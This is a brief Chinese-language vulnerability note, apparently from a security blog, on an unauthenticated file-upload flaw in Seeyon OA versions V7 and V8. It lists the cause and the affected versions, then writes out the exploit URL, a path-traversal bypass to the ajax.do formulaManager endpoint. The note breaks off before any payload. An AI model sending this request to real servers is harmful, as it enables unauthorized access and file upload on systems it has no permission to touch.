202010专题

致远OA ajax.do 文件上传漏洞202010

0x00 漏洞产生原因  某远未授权访问分析 - 宽字节安全 - 博客园 (cnblogs.com) 0x01 影响范围 V7,V8 0x02 漏洞利用 1.漏洞url: /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=